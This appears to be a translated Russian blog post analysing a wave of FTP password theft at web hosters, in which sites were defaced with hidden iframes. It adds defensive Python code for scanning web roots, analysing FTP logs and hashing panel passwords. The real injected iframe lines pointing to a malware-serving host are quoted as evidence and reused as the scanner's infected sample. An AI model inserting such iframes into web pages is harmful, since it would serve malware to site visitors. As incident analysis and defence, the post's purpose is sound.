
A wave of theft of FTP passwords: Hackers, hosters and naked women

Here is an interesting article my friend and colleague wrote:

From the official statement of representatives of the company "Masterhost"
“Over the past few days, specialists of the technical security service of the company .masterhost have recorded a sharp increase in incidents of theft of FTP access details from users' computers. Chances are that these are targeted wave attacks by Trojans or viruses that carry out various unauthorized actions on your behalf. Our specialists, together with partner companies specializing in information security solutions, are actively studying malicious traffic in order to localize the source of the malicious attacks ... ”

What happened?
One fine morning naked women appeared on the main and other pages of several sites. In the HTML source it looked like this:

')
<iframe src='http://lem0n.info/km/ya.php' width=1 height=1></iframe>

<iframe src='http://lem0n.info/km/love.htm' width=1 height=1></iframe>

These lines were inserted into index.php, index.htm and index.html.
When a visitor loaded the page, a virus tried to load (fortunately, the anti-virus did not miss it) and, in addition to the normal content of the site, various naked women were loaded.
The difficulty was that the files had been edited over FTP. At first the administration system was suspected of being hacked, but everything turned out to be completely different: one of the hacked projects was pure HTML and contained no PHP at all. In addition, CHMOD was 644 everywhere, which means that only the owner or root could edit the files.
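The injection above is easy to spot mechanically: a 1x1 iframe pointing at a host that is not ours has no business in an index file. The following scanner is an added example and not code from the original article or from any hoster; the trusted-host list, the file names and the sample pages are assumptions, and the infected sample reuses the iframe line quoted above.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Constructed samples: a clean index page and one carrying the injection quoted above.
CLEAN_INDEX = "<html><body><h1>Welcome</h1></body></html>"
INFECTED_INDEX = (
    "<html><body><h1>Welcome</h1>"
    "<iframe src='http://lem0n.info/km/ya.php' width=1 height=1></iframe>"
    "</body></html>"
)

# Hosts our own pages may legitimately embed (assumption for this example).
TRUSTED_HOSTS = {"example.com", "www.example.com"}
INDEX_NAMES = ("index.php", "index.htm", "index.html")

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name = "value" | name = 'value' | name = value  (spaces around '=' allowed)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def _attrs(fragment):
    """Parse the attribute part of a tag into a lowercase dict."""
    out = {}
    for name, dq, sq, bare in ATTR_RE.findall(fragment):
        out[name.lower()] = dq or sq or bare
    return out


def suspicious_iframes(html, trusted_hosts=TRUSTED_HOSTS):
    """Return src URLs of iframes that are tiny or hidden and point off-site."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = _attrs(m.group(1))
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
        hidden = "display:none" in attrs.get("style", "").replace(" ", "").lower()
        if host and host not in trusted_hosts and (tiny or hidden):
            findings.append(src)
    return findings


def scan_webroot(root, names=INDEX_NAMES):
    """Walk a document root and report injected iframes in every index file."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name in names:
            hits = suspicious_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


def demo():
    """Build a throwaway webroot with one clean and one infected site and scan it."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "site1").mkdir()
        (Path(root) / "site2").mkdir()
        (Path(root) / "site1" / "index.html").write_text(CLEAN_INDEX)
        (Path(root) / "site2" / "index.php").write_text(INFECTED_INDEX)
        return scan_webroot(root)


if __name__ == "__main__":
    for path, urls in demo().items():
        print(f"{path}: {', '.join(urls)}")
```

Run it from cron against the real document root and diff the report against the previous run; a site whose index file suddenly embeds an off-site 1x1 frame is worth an alert even before anyone notices the "extra content".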

Who did this?
Of course, we requested the masterhost logs of FTP visits to the sites on that “Walpurgis night”. The FTP logins came from the IP address 84.252.148.70, whose reverse DNS pointed to SPORT.MCHOST.RU. This made it clear that root had nothing to do with it. Visiting mchost.ru revealed a rather obscure hosting provider, listing only an email address and an ICQ number under “contacts” and Yandex.Money under “payment methods”. In other words, the physical location of this hoster could hardly be found even from a satellite. It is quite obvious that this server was simply hacked and used as a platform for the attack. The owner of the hoster, of course, will never admit this and therefore will not hand over any logs. That, alas, leaves the intruder out of reach.

How were the sites hacked?
The .masterhost logs confirm an FTP login to the site, which means someone knew the password. It is unlikely that the password was guessed. A more plausible theory seemed to us that a virus on the local computer searches for passwords and sends them somewhere. Adequate precautions against such attacks are known to everyone. The case seemed solved, but ... many sites were hacked, and no single person knew all of those passwords at once. Google suggested that we were not alone in the universe: a whole wave of such hacks had swept through the network.
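The reasoning in this section is exactly what a log review automates: a successful login from an IP the account has never used before, followed by an upload of an index file, and the same IP logging into several unrelated accounts. The following analysis is an added example, not the hoster's logging or code; the log format is a constructed, simplified one (real FTP daemons log differently, and the parser would have to be adapted), the baseline cut-off date is an assumption, and the attacker IP is the one quoted in the article.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed FTP log excerpt in an invented one-line-per-event format.
# 192.0.2.10 and 198.51.100.7 are documentation addresses standing in for real customers.
FTP_LOG = """\
2007-03-10 10:02:11 LOGIN OK user=site1 ip=192.0.2.10
2007-03-10 10:03:40 STOR user=site1 ip=192.0.2.10 file=/htdocs/news.html
2007-03-13 03:12:05 LOGIN OK user=site1 ip=84.252.148.70
2007-03-13 03:12:09 STOR user=site1 ip=84.252.148.70 file=/htdocs/index.html
2007-03-13 03:12:10 STOR user=site1 ip=84.252.148.70 file=/htdocs/index.php
2007-03-13 03:13:41 LOGIN OK user=site2 ip=84.252.148.70
2007-03-13 03:13:44 STOR user=site2 ip=84.252.148.70 file=/index.htm
2007-03-13 09:30:00 LOGIN FAIL user=site3 ip=198.51.100.7
"""

LINE_RE = re.compile(
    r"^(\S+ \S+) (LOGIN OK|LOGIN FAIL|STOR) user=(\S+) ip=(\S+)(?: file=(\S+))?$"
)
INDEX_FILES = {"index.php", "index.htm", "index.html"}


def parse(log_text):
    """Turn the constructed log into a list of event dicts, skipping unparsable lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, kind, user, ip, path = m.groups()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "kind": kind, "user": user, "ip": ip, "file": path,
        })
    return events


def analyze(events, baseline_end):
    """Learn each account's usual source IPs before baseline_end, then flag:
    - a later successful login from an IP the account never used (new_ip_login),
    - an index-file upload in a session opened from such an IP (index_overwrite),
    - one IP logging into several accounts (multi_account_ip), the signature of
      a batch of stolen credentials rather than one careless customer."""
    known = defaultdict(set)
    for e in events:
        if e["kind"] == "LOGIN OK" and e["ts"] < baseline_end:
            known[e["user"]].add(e["ip"])

    alerts = []
    accounts_per_ip = defaultdict(set)
    tainted = set()  # (user, ip) pairs whose login came from an unknown address
    for e in events:
        if e["ts"] < baseline_end:
            continue
        if e["kind"] == "LOGIN OK":
            accounts_per_ip[e["ip"]].add(e["user"])
            if e["ip"] not in known[e["user"]]:
                tainted.add((e["user"], e["ip"]))
                alerts.append(("new_ip_login", e["user"], e["ip"]))
        elif e["kind"] == "STOR" and (e["user"], e["ip"]) in tainted:
            if e["file"].rsplit("/", 1)[-1] in INDEX_FILES:
                alerts.append(("index_overwrite", e["user"], e["file"]))
    for ip, users in sorted(accounts_per_ip.items()):
        if len(users) > 1:
            alerts.append(("multi_account_ip", ip, tuple(sorted(users))))
    return alerts


def run_example():
    """Analyse the constructed excerpt with a baseline ending on 2007-03-12."""
    return analyze(parse(FTP_LOG), datetime(2007, 3, 12))


if __name__ == "__main__":
    for alert in run_example():
        print(alert)
```

The third rule is the one that would have answered the "who knew all these passwords?" question: a single address touching many accounts in minutes is not a customer, and a hoster seeing that pattern can freeze the affected accounts before the next index file is overwritten.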

Conclusions
The mass character of these hacks suggests that it is not only viruses that leak passwords, but also hosters. It is hard to believe that every victim was caught by the virus. How could one hack a hoster and learn its users' FTP passwords? This was hardly a FreeBSD compromise, for many reasons. One has to agree with those who believe this was a hack of the control panel.
1. The control panel has access to the FTP passwords (since a password can be changed through it); therefore a certain request allows one to obtain at least a list of password hashes, and perhaps the passwords themselves.
2. Many hosters were hacked. Consequently, they all share the same vulnerability in the control panel. Of course, neither masterhost nor other hosters will ever admit this directly. However, some of their statements on the hacks confirm the control-panel version.
Example: Valuehost
What has been done now:
+ a new algorithm for storing FTP passwords is used to protect against hacking;
+ a function has been introduced in the control panel for setting the number of days after which a new password expires;
+ a function has been introduced for blocking FTP access if you are not going to update the site for a long time.
A new password storage algorithm and a password aging feature are innovations that help protect against password theft by brute force. So before this, someone evidently still had the opportunity to enumerate passwords.
The function for blocking FTP access if you are not going to update the site for a long time is the telling point. Hosters, despite the measures taken, cannot guarantee full protection of FTP passwords and offer me to disable FTP access for the sake of general security.
Masterhost is more cautious in its statements, but the evidence of the hack confirms that it has similar problems. Of course, one must understand that the problem originally lies in the software installed as the control panel, but the hoster's position is still wrong: it did not bother to develop its own control panel, or if it did, it did not protect it well.
The results of thinking this over are very sad: if Agava and masterhost were hacked, what can be said about other hosters? It remains to hope and believe that hosters will work on their control panels and add the appropriate protection, and that people, in turn, will guard their passwords more carefully and protect themselves from viruses. Hope, as is known, dies last ...
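The two Valuehost measures that matter (a new storage algorithm and password aging) follow from the design flaw in point 1 above: a panel that can hand back the password stores something recoverable. Changing a password never requires reading the old one, so the record only needs a salted, slow hash. The following model is an added example of that design, not Valuehost's or masterhost's code; the class name, the 90-day lifetime and the iteration count are assumptions, and `leaked_record` stands in for what an attacker with a panel-level read would obtain from the two designs.

```python
import hashlib
import hmac
import os
from datetime import datetime, timedelta


class LegacyFtpAccount:
    """The weak design the article implies: the panel keeps the password itself,
    so any read of the account table yields working FTP credentials."""

    def __init__(self, username, password):
        self.username = username
        self.password = password

    def verify(self, password):
        return password == self.password


class FtpAccount:
    """Hypothetical hardened control-panel record: holds only a salted PBKDF2
    hash plus the change date, so the password cannot be read back and it
    expires after MAX_AGE (the aging feature in the list above)."""

    ITERATIONS = 200_000          # assumption; tune to the panel's hardware
    MAX_AGE = timedelta(days=90)  # assumption; the panel exposes this as a setting

    def __init__(self, username, password, now):
        self.username = username
        self.ftp_enabled = True   # the "block FTP access" switch
        self.set_password(password, now)

    def _hash(self, password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.ITERATIONS)

    def set_password(self, password, now):
        """Changing the password needs no access to the old one: new salt, new hash."""
        self.salt = os.urandom(16)
        self.digest = self._hash(password, self.salt)
        self.changed_at = now

    def is_expired(self, now):
        return now - self.changed_at > self.MAX_AGE

    def verify(self, password, now):
        """Constant-time comparison; refuses disabled and expired accounts."""
        if not self.ftp_enabled or self.is_expired(now):
            return False
        return hmac.compare_digest(self._hash(password, self.salt), self.digest)


def leaked_record(account):
    """What a panel-level read exposes: plaintext for the legacy design,
    only salt, hash and date for the hardened one."""
    if isinstance(account, LegacyFtpAccount):
        return {"user": account.username, "password": account.password}
    return {
        "user": account.username,
        "salt": account.salt.hex(),
        "pbkdf2_sha256": account.digest.hex(),
        "changed_at": account.changed_at.isoformat(),
    }


if __name__ == "__main__":
    created = datetime(2007, 3, 1)
    acct = FtpAccount("site1", "correct horse", created)
    print("login ok :", acct.verify("correct horse", datetime(2007, 3, 15)))
    print("expired  :", acct.verify("correct horse", datetime(2007, 7, 1)))
    print("leak     :", leaked_record(acct))
    print("legacy   :", leaked_record(LegacyFtpAccount("site1", "correct horse")))
```

With the hashed design a dump of the account table still has to be brute-forced per account at 200,000 PBKDF2 rounds per guess, and the aging rule bounds how long a cracked or stolen password stays usable; the "disable FTP" switch is simply `ftp_enabled = False`, which is why the article reads it as the hoster admitting it cannot protect the credential itself.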

A necessary addition
The virus that tried to load from the hacked sites really does find and send passwords from your computer. In this way 2 FTP accounts were hacked on our own working server, which has no control panel at all, and whose access logs show no attempt to brute-force FTP passwords. So you also need to protect your computers and take password storage more seriously.

From the official statement of representatives of the company "Masterhost"
“In order to reduce the risk of infection of your computer, we also advise you to update your anti-virus software, including the anti-virus database, in a timely manner. ... your resources and be sure to check your personal computer with the latest anti-virus software.”

Technical Director of Creative People
A. Lebedev

Source: https://habr.com/ru/post/6028/
